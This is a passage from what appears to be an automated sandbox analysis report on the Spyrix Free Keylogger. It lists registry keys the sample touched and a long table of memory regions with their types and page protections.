HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
VersionMajor
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
VersionMinor
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
|
EstimatedSize
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
|
Version
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{FBF23B40-E3F0-101B-8488-00AA003E56F8} {000214E4-0000-0000-C000-000000000046} 0xFFFF
|
There are 39 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7CF000
|
heap
|
page read and write
|
||
A16000
|
heap
|
page read and write
|
||
2C9E000
|
heap
|
page read and write
|
||
FF394FE000
|
unkown
|
page readonly
|
||
1550000
|
heap
|
page read and write
|
||
54EE000
|
stack
|
page read and write
|
||
4410000
|
direct allocation
|
page execute and read and write
|
||
77F1000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
33BB000
|
heap
|
page read and write
|
||
778A000
|
heap
|
page read and write
|
||
8B67000
|
direct allocation
|
page read and write
|
||
2BE1770A000
|
heap
|
page read and write
|
||
3BF0000
|
direct allocation
|
page execute and read and write
|
||
1066000
|
unkown
|
page read and write
|
||
74A000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
8FF000
|
heap
|
page read and write
|
||
33C0000
|
heap
|
page read and write
|
||
508E000
|
stack
|
page read and write
|
||
2FCC000
|
heap
|
page read and write
|
||
788E000
|
stack
|
page read and write
|
||
1B21000
|
heap
|
page read and write
|
||
8AE7000
|
direct allocation
|
page read and write
|
||
79CE000
|
stack
|
page read and write
|
||
2BF0000
|
trusted library allocation
|
page read and write
|
||
4D9F000
|
direct allocation
|
page read and write
|
||
1295C1C2000
|
heap
|
page read and write
|
||
23B3000
|
heap
|
page read and write
|
||
40F0000
|
direct allocation
|
page execute and read and write
|
||
3A50000
|
direct allocation
|
page execute and read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
11B0000
|
heap
|
page read and write
|
||
15D8000
|
heap
|
page read and write
|
||
9FE000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
EEE000
|
stack
|
page read and write
|
||
318F000
|
heap
|
page read and write
|
||
34AE000
|
heap
|
page read and write
|
||
2BE17430000
|
trusted library allocation
|
page read and write
|
||
2CB5000
|
heap
|
page read and write
|
||
51E0000
|
heap
|
page execute and read and write
|
||
155C000
|
heap
|
page read and write
|
||
8B1F000
|
direct allocation
|
page read and write
|
||
42A0000
|
direct allocation
|
page execute and read and write
|
||
33A4000
|
heap
|
page read and write
|
||
7B14000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
44A0000
|
direct allocation
|
page read and write
|
||
556E000
|
stack
|
page read and write
|
||
29CE000
|
stack
|
page read and write
|
||
915000
|
unkown
|
page execute and read and write
|
||
348F000
|
heap
|
page read and write
|
||
2CB1000
|
heap
|
page read and write
|
||
33C0000
|
heap
|
page read and write
|
||
7A5000
|
heap
|
page read and write
|
||
34C3000
|
heap
|
page read and write
|
||
31AE000
|
heap
|
page read and write
|
||
7B7000
|
heap
|
page read and write
|
||
1AF3000
|
heap
|
page read and write
|
||
2BE12A91000
|
trusted library allocation
|
page read and write
|
||
CF7000
|
stack
|
page read and write
|
||
43E000
|
unkown
|
page readonly
|
||
4140000
|
direct allocation
|
page execute and read and write
|
||
7FE17000
|
direct allocation
|
page read and write
|
||
502E000
|
stack
|
page read and write
|
||
925000
|
unkown
|
page execute and read and write
|
||
7FDF0000
|
direct allocation
|
page read and write
|
||
1066000
|
unkown
|
page write copy
|
||
2FD4000
|
heap
|
page read and write
|
||
59E000
|
stack
|
page read and write
|
||
9990000
|
heap
|
page read and write
|
||
29B0000
|
trusted library allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
3340000
|
heap
|
page read and write
|
||
2BE11E70000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
3485000
|
heap
|
page read and write
|
||
1295C1BC000
|
heap
|
page read and write
|
||
1160000
|
trusted library allocation
|
page read and write
|
||
4CF2000
|
direct allocation
|
page read and write
|
||
7ACC000
|
heap
|
page read and write
|
||
1459000
|
heap
|
page read and write
|
||
2D70000
|
heap
|
page read and write
|
||
11E0000
|
heap
|
page read and write
|
||
D11000
|
unkown
|
page execute read
|
||
6C54000
|
direct allocation
|
page read and write
|
||
32D6000
|
heap
|
page read and write
|
||
1AEF000
|
heap
|
page read and write
|
||
FF384FE000
|
stack
|
page read and write
|
||
84E0000
|
trusted library allocation
|
page read and write
|
||
1295C110000
|
heap
|
page read and write
|
||
2BE175D0000
|
remote allocation
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
7721000
|
heap
|
page read and write
|
||
94F000
|
stack
|
page read and write
|
||
2ACB000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
A84000
|
unkown
|
page execute and read and write
|
||
17E0000
|
heap
|
page read and write
|
||
9DA000
|
unkown
|
page execute and read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
32F0000
|
heap
|
page read and write
|
||
87D7000
|
direct allocation
|
page read and write
|
||
A2F0000
|
trusted library allocation
|
page execute and read and write
|
||
12DA000
|
heap
|
page read and write
|
||
7789000
|
heap
|
page read and write
|
||
3493000
|
heap
|
page read and write
|
||
7717000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
34D8000
|
heap
|
page read and write
|
||
4050000
|
direct allocation
|
page execute and read and write
|
||
1295C3E0000
|
heap
|
page read and write
|
||
2773000
|
direct allocation
|
page read and write
|
||
3299000
|
heap
|
page read and write
|
||
3462000
|
heap
|
page read and write
|
||
61E01000
|
unkown
|
page execute read
|
||
2BC1000
|
trusted library allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
4FF0000
|
trusted library allocation
|
page read and write
|
||
61E9F000
|
unkown
|
page readonly
|
||
6520000
|
direct allocation
|
page read and write
|
||
3BE0000
|
direct allocation
|
page execute and read and write
|
||
342D000
|
stack
|
page read and write
|
||
7FC10000
|
direct allocation
|
page read and write
|
||
5660000
|
heap
|
page read and write
|
||
4FF0000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2FA0000
|
heap
|
page read and write
|
||
455D000
|
direct allocation
|
page read and write
|
||
3FE0000
|
direct allocation
|
page execute and read and write
|
||
270F000
|
direct allocation
|
page read and write
|
||
C0D000
|
stack
|
page read and write
|
||
2CBB000
|
heap
|
page read and write
|
||
9C8000
|
unkown
|
page execute and read and write
|
||
32D0000
|
heap
|
page read and write
|
||
3730000
|
direct allocation
|
page execute and read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
3436000
|
direct allocation
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
1B15000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
36F8000
|
direct allocation
|
page read and write
|
||
2BE176F8000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
355A000
|
heap
|
page read and write
|
||
3240000
|
direct allocation
|
page read and write
|
||
3B10000
|
direct allocation
|
page execute and read and write
|
||
4D0000
|
heap
|
page read and write
|
||
349F000
|
heap
|
page read and write
|
||
2F80000
|
heap
|
page read and write
|
||
2BE18000000
|
heap
|
page read and write
|
||
2FD5000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
1295C1F6000
|
heap
|
page read and write
|
||
1455000
|
heap
|
page read and write
|
||
4591000
|
direct allocation
|
page read and write
|
||
97E000
|
stack
|
page read and write
|
||
34B2000
|
heap
|
page read and write
|
||
1AE0000
|
heap
|
page read and write
|
||
2AFC000
|
stack
|
page read and write
|
||
7784000
|
heap
|
page read and write
|
||
5A9000
|
unkown
|
page read and write
|
||
3900000
|
direct allocation
|
page execute and read and write
|
||
3485000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1295C1EF000
|
heap
|
page read and write
|
||
36C0000
|
remote allocation
|
page read and write
|
||
3E60000
|
direct allocation
|
page execute and read and write
|
||
33A4000
|
heap
|
page read and write
|
||
2BEE000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
34A5000
|
heap
|
page read and write
|
||
319D000
|
heap
|
page read and write
|
||
4490000
|
direct allocation
|
page execute and read and write
|
||
5DF000
|
stack
|
page read and write
|
||
2320000
|
heap
|
page read and write
|
||
2C83000
|
heap
|
page read and write
|
||
7FE10000
|
direct allocation
|
page read and write
|
||
2BE17580000
|
trusted library allocation
|
page read and write
|
||
2282000
|
direct allocation
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
507E000
|
stack
|
page read and write
|
||
4330000
|
direct allocation
|
page execute and read and write
|
||
33A4000
|
heap
|
page read and write
|
||
77F1000
|
heap
|
page read and write
|
||
C5E000
|
stack
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
1C65000
|
heap
|
page read and write
|
||
865000
|
unkown
|
page execute and write copy
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
8B9C000
|
direct allocation
|
page read and write
|
||
3643000
|
heap
|
page read and write
|
||
7DBC000
|
heap
|
page read and write
|
||
32C0000
|
heap
|
page read and write
|
||
2BE120BA000
|
heap
|
page read and write
|
||
7E5000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
3472000
|
heap
|
page read and write
|
||
2F0E000
|
stack
|
page read and write
|
||
5008000
|
trusted library allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
340E000
|
stack
|
page read and write
|
||
4360000
|
direct allocation
|
page execute and read and write
|
||
12BE99D0000
|
heap
|
page read and write
|
||
863D000
|
direct allocation
|
page read and write
|
||
56D000
|
stack
|
page read and write
|
||
2DD0000
|
heap
|
page read and write
|
||
77F6000
|
heap
|
page read and write
|
||
1295C120000
|
heap
|
page read and write
|
||
7FD50000
|
direct allocation
|
page read and write
|
||
12DB000
|
heap
|
page read and write
|
||
42D0000
|
direct allocation
|
page execute and read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
85EA000
|
direct allocation
|
page read and write
|
||
327E000
|
stack
|
page read and write
|
||
7735000
|
heap
|
page read and write
|
||
2DD0000
|
trusted library allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
BCE000
|
stack
|
page read and write
|
||
FF388FB000
|
stack
|
page read and write
|
||
79A000
|
heap
|
page read and write
|
||
3D50000
|
direct allocation
|
page execute and read and write
|
||
12BE9AE0000
|
heap
|
page read and write
|
||
2BE12913000
|
heap
|
page read and write
|
||
6A9E000
|
stack
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
463C000
|
direct allocation
|
page read and write
|
||
3650000
|
heap
|
page read and write
|
||
2BE17438000
|
trusted library allocation
|
page read and write
|
||
12D1000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
3200000
|
heap
|
page read and write
|
||
346A000
|
direct allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
12BE97F7000
|
heap
|
page read and write
|
||
78C000
|
heap
|
page read and write
|
||
2FD3000
|
heap
|
page read and write
|
||
3EF0000
|
direct allocation
|
page execute and read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
8CDB000
|
direct allocation
|
page read and write
|
||
30DE000
|
stack
|
page read and write
|
||
2CBA000
|
heap
|
page read and write
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
1067000
|
unkown
|
page write copy
|
||
3EE0000
|
direct allocation
|
page execute and read and write
|
||
12CA000
|
heap
|
page read and write
|
||
2BE12900000
|
heap
|
page read and write
|
||
7F3000
|
heap
|
page read and write
|
||
F9E000
|
unkown
|
page write copy
|
||
49E000
|
stack
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2BE11E50000
|
heap
|
page read and write
|
||
51A0000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
23AF000
|
direct allocation
|
page read and write
|
||
26EF000
|
direct allocation
|
page read and write
|
||
13E6000
|
heap
|
page read and write
|
||
8850000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
3498000
|
heap
|
page read and write
|
||
50BF000
|
stack
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
2289000
|
direct allocation
|
page read and write
|
||
2C83000
|
heap
|
page read and write
|
||
1295C21F000
|
heap
|
page read and write
|
||
77F1000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
2BE173B0000
|
trusted library allocation
|
page read and write
|
||
790F000
|
stack
|
page read and write
|
||
7735000
|
heap
|
page read and write
|
||
3B70000
|
direct allocation
|
page execute and read and write
|
||
5E0000
|
heap
|
page read and write
|
||
3472000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2AB0000
|
heap
|
page read and write
|
||
12BE97F0000
|
heap
|
page read and write
|
||
2DE5000
|
trusted library allocation
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
23F9000
|
direct allocation
|
page read and write
|
||
7FE43000
|
direct allocation
|
page read and write
|
||
3461000
|
heap
|
page read and write
|
||
348E000
|
heap
|
page read and write
|
||
2DC7000
|
trusted library allocation
|
page read and write
|
||
D50000
|
heap
|
page read and write
|
||
3481000
|
direct allocation
|
page read and write
|
||
323D000
|
stack
|
page read and write
|
||
12CA000
|
heap
|
page read and write
|
||
2F9F000
|
stack
|
page read and write
|
||
3660000
|
direct allocation
|
page execute and read and write
|
||
2C84000
|
heap
|
page read and write
|
||
2B40000
|
heap
|
page read and write
|
||
16B6000
|
heap
|
page read and write
|
||
2B0D000
|
stack
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
7D10000
|
heap
|
page read and write
|
||
928E000
|
stack
|
page read and write
|
||
3320000
|
heap
|
page read and write
|
||
36F0000
|
direct allocation
|
page execute and read and write
|
||
33A4000
|
heap
|
page read and write
|
||
8663000
|
direct allocation
|
page read and write
|
||
2F4D000
|
stack
|
page read and write
|
||
2BF0000
|
heap
|
page read and write
|
||
F20000
|
trusted library allocation
|
page read and write
|
||
36EA000
|
direct allocation
|
page read and write
|
||
4FF6000
|
trusted library allocation
|
page read and write
|
||
34A8000
|
heap
|
page read and write
|
||
2ED0000
|
heap
|
page read and write
|
||
3331000
|
direct allocation
|
page read and write
|
||
248A000
|
direct allocation
|
page read and write
|
||
32DC000
|
heap
|
page read and write
|
||
820000
|
heap
|
page read and write
|
||
66EA000
|
heap
|
page read and write
|
||
33BE000
|
stack
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
145A000
|
heap
|
page read and write
|
||
12DB000
|
heap
|
page read and write
|
||
35AE000
|
stack
|
page read and write
|
||
21C0000
|
direct allocation
|
page read and write
|
||
3C90000
|
direct allocation
|
page execute and read and write
|
||
33A4000
|
heap
|
page read and write
|
||
12D1000
|
heap
|
page read and write
|
||
82AC000
|
stack
|
page read and write
|
||
61E00000
|
unkown
|
page readonly
|
||
7735000
|
heap
|
page read and write
|
||
3430000
|
heap
|
page read and write
|
||
5C2B000
|
stack
|
page read and write
|
||
8CD8000
|
direct allocation
|
page read and write
|
||
7B66000
|
heap
|
page read and write
|
||
1B21000
|
heap
|
page read and write
|
||
7B2000
|
heap
|
page read and write
|
||
2F80000
|
trusted library allocation
|
page read and write
|
||
2DBE000
|
stack
|
page read and write
|
||
4B8E000
|
stack
|
page read and write
|
||
52D0000
|
trusted library allocation
|
page read and write
|
||
1F3AE730000
|
heap
|
page read and write
|
||
3070000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
7721000
|
heap
|
page read and write
|
||
2BE176C9000
|
heap
|
page read and write
|
||
3960000
|
direct allocation
|
page execute and read and write
|
||
61E88000
|
unkown
|
page write copy
|
||
2FD4000
|
heap
|
page read and write
|
||
2DBF000
|
trusted library allocation
|
page read and write
|
||
31AF000
|
heap
|
page read and write
|
||
1B0E000
|
heap
|
page read and write
|
||
7721000
|
heap
|
page read and write
|
||
2D21000
|
trusted library allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
34AC000
|
direct allocation
|
page read and write
|
||
36F1000
|
direct allocation
|
page read and write
|
||
1B2B000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
3F60000
|
direct allocation
|
page execute and read and write
|
||
458B000
|
direct allocation
|
page read and write
|
||
3AD0000
|
direct allocation
|
page execute and read and write
|
||
1F3AE735000
|
heap
|
page read and write
|
||
7FDDE000
|
direct allocation
|
page read and write
|
||
7FE11000
|
direct allocation
|
page read and write
|
||
348D000
|
heap
|
page read and write
|
||
7735000
|
heap
|
page read and write
|
||
3600000
|
heap
|
page read and write
|
||
242C000
|
direct allocation
|
page read and write
|
||
AFF000
|
stack
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
3203000
|
heap
|
page read and write
|
||
38C0000
|
direct allocation
|
page execute and read and write
|
||
86C4000
|
direct allocation
|
page read and write
|
||
CDE000
|
stack
|
page read and write
|
||
2E00000
|
trusted library allocation
|
page read and write
|
||
2BE12D40000
|
trusted library allocation
|
page read and write
|
||
12D1000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
337F000
|
stack
|
page read and write
|
||
67DF000
|
stack
|
page read and write
|
||
3C15000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
7717000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
22C6000
|
direct allocation
|
page read and write
|
||
2EC0000
|
remote allocation
|
page read and write
|
||
79D000
|
heap
|
page read and write
|
||
41B0000
|
direct allocation
|
page execute and read and write
|
||
33A4000
|
heap
|
page read and write
|
||
32C9000
|
heap
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
47D000
|
stack
|
page read and write
|
||
5630000
|
heap
|
page read and write
|
||
7FE4D000
|
direct allocation
|
page read and write
|
||
339F000
|
stack
|
page read and write
|
||
7E0000
|
direct allocation
|
page execute and read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
33B8000
|
heap
|
page read and write
|
||
1295C1B9000
|
heap
|
page read and write
|
||
506F000
|
stack
|
page read and write
|
||
783000
|
heap
|
page read and write
|
||
41E0000
|
direct allocation
|
page execute and read and write
|
||
1840000
|
heap
|
page read and write
|
||
8CC000
|
stack
|
page read and write
|
||
16F0000
|
direct allocation
|
page read and write
|
||
2EE5000
|
heap
|
page read and write
|
||
12CA000
|
heap
|
page read and write
|
||
106A000
|
unkown
|
page write copy
|
||
4180000
|
direct allocation
|
page execute and read and write
|
||
33A4000
|
heap
|
page read and write
|
||
86A7000
|
direct allocation
|
page read and write
|
||
794E000
|
stack
|
page read and write
|
||
74F000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
348A000
|
heap
|
page read and write
|
||
3AC0000
|
direct allocation
|
page execute and read and write
|
||
4F9F000
|
stack
|
page read and write
|
||
1B18000
|
heap
|
page read and write
|
||
1B11000
|
heap
|
page read and write
|
||
F10000
|
trusted library allocation
|
page read and write
|
||
7FD90000
|
direct allocation
|
page read and write
|
||
55CF000
|
stack
|
page read and write
|
||
1AEC000
|
heap
|
page read and write
|
||
3193000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
777000
|
heap
|
page read and write
|
||
3FD0000
|
direct allocation
|
page execute and read and write
|
||
3BA0000
|
direct allocation
|
page execute and read and write
|
||
5DE000
|
stack
|
page read and write
|
||
77F1000
|
heap
|
page read and write
|
||
12A3000
|
heap
|
page read and write
|
||
29FE000
|
stack
|
page read and write
|
||
2F50000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
7C8000
|
heap
|
page read and write
|
||
2CB1000
|
heap
|
page read and write
|
||
22A9000
|
direct allocation
|
page read and write
|
||
2BE176EC000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
DFD000
|
stack
|
page read and write
|
||
23CA000
|
direct allocation
|
page read and write
|
||
55AF000
|
stack
|
page read and write
|
||
764D000
|
stack
|
page read and write
|
||
2BE1764D000
|
heap
|
page read and write
|
||
33AE000
|
stack
|
page read and write
|
||
2FF6000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
7AA000
|
heap
|
page read and write
|
||
3B50000
|
direct allocation
|
page execute and read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
7BD000
|
heap
|
page read and write
|
||
3430000
|
direct allocation
|
page execute and read and write
|
||
32C9000
|
heap
|
page read and write
|
||
1B2B000
|
heap
|
page read and write
|
||
3640000
|
heap
|
page read and write
|
||
6C1D000
|
stack
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
A50000
|
heap
|
page read and write
|
||
2CB5000
|
heap
|
page read and write
|
||
38A0000
|
direct allocation
|
page execute and read and write
|
||
32D5000
|
direct allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
735000
|
heap
|
page read and write
|
||
1A8217F000
|
stack
|
page read and write
|
||
788000
|
heap
|
page read and write
|
||
7FE00000
|
direct allocation
|
page read and write
|
||
501F000
|
stack
|
page read and write
|
||
5DC000
|
stack
|
page read and write
|
||
39B0000
|
direct allocation
|
page execute and read and write
|
||
2BE174F2000
|
trusted library allocation
|
page read and write
|
||
225D000
|
direct allocation
|
page read and write
|
||
2FCC000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
1299000
|
heap
|
page read and write
|
||
2B90000
|
trusted library allocation
|
page read and write
|
||
3310000
|
heap
|
page read and write
|
||
189D000
|
heap
|
page read and write
|
||
34AA000
|
heap
|
page read and write
|
||
D10000
|
heap
|
page read and write
|
||
106A000
|
unkown
|
page write copy
|
||
3640000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
2ACF000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
7C4000
|
heap
|
page read and write
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
85F5000
|
direct allocation
|
page read and write
|
||
7735000
|
heap
|
page read and write
|
||
2741000
|
direct allocation
|
page read and write
|
||
FF38EFE000
|
unkown
|
page readonly
|
||
2BE12013000
|
heap
|
page read and write
|
||
4FFE000
|
stack
|
page read and write
|
||
3558000
|
heap
|
page read and write
|
||
7D7F000
|
heap
|
page read and write
|
||
7789000
|
heap
|
page read and write
|
||
355B000
|
heap
|
page read and write
|
||
FF38DFE000
|
unkown
|
page readonly
|
||
22E3000
|
direct allocation
|
page read and write
|
||
3656000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
1061000
|
unkown
|
page read and write
|
||
3580000
|
direct allocation
|
page execute and read and write
|
||
456C000
|
direct allocation
|
page read and write
|
||
4210000
|
direct allocation
|
page execute and read and write
|
||
7B6000
|
heap
|
page read and write
|
||
5008000
|
trusted library allocation
|
page read and write
|
||
5300000
|
heap
|
page read and write
|
||
3680000
|
direct allocation
|
page execute and read and write
|
||
4DD9000
|
direct allocation
|
page read and write
|
||
50F0000
|
heap
|
page read and write
|
||
3642000
|
heap
|
page read and write
|
||
66E000
|
stack
|
page read and write
|
||
1B1A000
|
heap
|
page read and write
|
||
2BE17521000
|
trusted library allocation
|
page read and write
|
||
1B2A000
|
heap
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
FF389FE000
|
unkown
|
page readonly
|
||
1066000
|
unkown
|
page read and write
|
||
500A000
|
trusted library allocation
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
7789000
|
heap
|
page read and write
|
||
241D000
|
direct allocation
|
page read and write
|
||
2AD0000
|
heap
|
page read and write
|
||
4420000
|
direct allocation
|
page execute and read and write
|
||
F9E000
|
unkown
|
page read and write
|
||
3038000
|
heap
|
page read and write
|
||
3EA0000
|
direct allocation
|
page execute and read and write
|
||
1295C1F0000
|
heap
|
page read and write
|
||
4DA4000
|
direct allocation
|
page read and write
|
||
34AA000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
9E3867F000
|
stack
|
page read and write
|
||
1A7E000
|
stack
|
page read and write
|
||
A1B000
|
heap
|
page read and write
|
||
2300000
|
heap
|
page read and write
|
||
7FE40000
|
direct allocation
|
page read and write
|
||
54BC000
|
stack
|
page read and write
|
||
43B0000
|
direct allocation
|
page execute and read and write
|
||
1790000
|
heap
|
page read and write
|
||
2FF1000
|
heap
|
page read and write
|
||
5310000
|
heap
|
page read and write
|
||
3463000
|
direct allocation
|
page read and write
|
||
1295C1C2000
|
heap
|
page read and write
|
||
652A000
|
direct allocation
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
8B3F000
|
direct allocation
|
page read and write
|
||
19980FE000
|
stack
|
page read and write
|
||
316E000
|
stack
|
page read and write
|
||
2BE1206D000
|
heap
|
page read and write
|
||
150000
|
stack
|
page read and write
|
||
323E000
|
stack
|
page read and write
|
||
3299000
|
heap
|
page read and write
|
||
2BE17474000
|
trusted library allocation
|
page read and write
|
||
7F7000
|
heap
|
page read and write
|
||
2BE176C0000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
7FD88000
|
direct allocation
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
924F000
|
stack
|
page read and write
|
||
77D000
|
stack
|
page read and write
|
||
4250000
|
direct allocation
|
page execute and read and write
|
||
33A4000
|
heap
|
page read and write
|
||
7A3000
|
heap
|
page read and write
|
||
2DFE000
|
trusted library allocation
|
page read and write
|
||
7611000
|
heap
|
page read and write
|
||
66B0000
|
heap
|
page read and write
|
||
1925000
|
heap
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2265000
|
direct allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
44E1000
|
direct allocation
|
page read and write
|
||
2DC2000
|
trusted library allocation
|
page read and write
|
||
7722000
|
heap
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
2442000
|
direct allocation
|
page read and write
|
||
450000
|
heap
|
page read and write
|
||
18C8000
|
heap
|
page read and write
|
||
12D1000
|
heap
|
page read and write
|
||
5536000
|
heap
|
page read and write
|
||
2F4F000
|
stack
|
page read and write
|
||
7DB000
|
heap
|
page read and write
|
||
30D0000
|
heap
|
page read and write
|
||
31FF000
|
heap
|
page read and write
|
||
512E000
|
stack
|
page read and write
|
||
FF382FE000
|
unkown
|
page readonly
|
||
3350000
|
direct allocation
|
page execute and read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
43E0000
|
direct allocation
|
page execute and read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
F72000
|
heap
|
page read and write
|
||
1B25000
|
heap
|
page read and write
|
||
7FD42000
|
direct allocation
|
page read and write
|
||
AE0000
|
heap
|
page read and write
|
||
7734000
|
heap
|
page read and write
|
||
42E0000
|
direct allocation
|
page execute and read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
890000
|
unkown
|
page execute and read and write
|
||
7D8D000
|
heap
|
page read and write
|
||
33BB000
|
heap
|
page read and write
|
||
77F1000
|
heap
|
page read and write
|
||
2765000
|
direct allocation
|
page read and write
|
||
86FB000
|
direct allocation
|
page read and write
|
||
2FE4000
|
heap
|
page read and write
|
||
452B000
|
direct allocation
|
page read and write
|
||
2BE17659000
|
heap
|
page read and write
|
||
1061000
|
unkown
|
page read and write
|
||
2BEE000
|
stack
|
page read and write
|
||
12BE000
|
heap
|
page read and write
|
||
365A000
|
heap
|
page read and write
|
||
2FD4000
|
heap
|
page read and write
|
||
333E000
|
stack
|
page read and write
|
||
2BE176FA000
|
heap
|
page read and write
|
||
1B20000
|
heap
|
page read and write
|
||
36A0000
|
direct allocation
|
page execute and read and write
|
||
31AA000
|
heap
|
page read and write
|
||
3D30000
|
direct allocation
|
page execute and read and write
|
||
FF38D7E000
|
stack
|
page read and write
|
||
36C0000
|
remote allocation
|
page read and write
|
||
1295C1DB000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
33A4000
|
heap
|
page read and write
|
||
28CF000
|
stack
|
page read and write
|
||
8480000
|
trusted library allocation
|
page read and write
|
||
7734000
|
heap
|
page read and write
|
||
4260000
|
direct allocation
|
page execute and read and write
|
||
900000
|
heap
|
page read and write
|
||
7716000
|
heap
|
page read and write
|
||
2BE11F90000
|
trusted library section
|
page read and write
|
||
2FE4000
|
heap
|
